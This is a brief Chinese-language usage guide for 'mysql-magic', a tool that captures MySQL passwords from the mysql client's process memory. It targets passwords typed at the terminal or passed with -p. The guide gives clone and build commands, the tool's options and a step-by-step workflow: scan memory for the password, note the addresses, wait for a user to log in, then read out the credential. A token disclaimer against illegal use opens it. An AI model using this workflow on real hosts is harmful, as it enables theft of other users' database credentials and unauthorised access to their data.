声明:请勿使用非法目的。
利用条件目标是获取通过tty传递的密码,也可以获取从命令行(-pxxxxxx)传递的密码。
0x00 安装
安装:
1、git clone --recurse-submodules https://github.com/hc0d3r/mysql-magic
2、cd mysql-magic
3、make #编译
0x01 运行
mysql-magic [options] -o 逗号分隔的内存地址列表例0x123,0x1234 -s 内存搜索密码 -d
写入内存目录 -l 监听Listen mode, wait for outgoing ipv4 connections on port 3306 -r Sleep time (Default: 3 seconds) -p Use process_vm_readv instead of /proc/pid/mem
/mysql-magic -s
使用-s 在内存搜索密码
获取到内存地址
模拟正常用户登录mysql
mysql-magic -o 内存地址 -d 保存内存的目录 -l 监听3306
获取到密码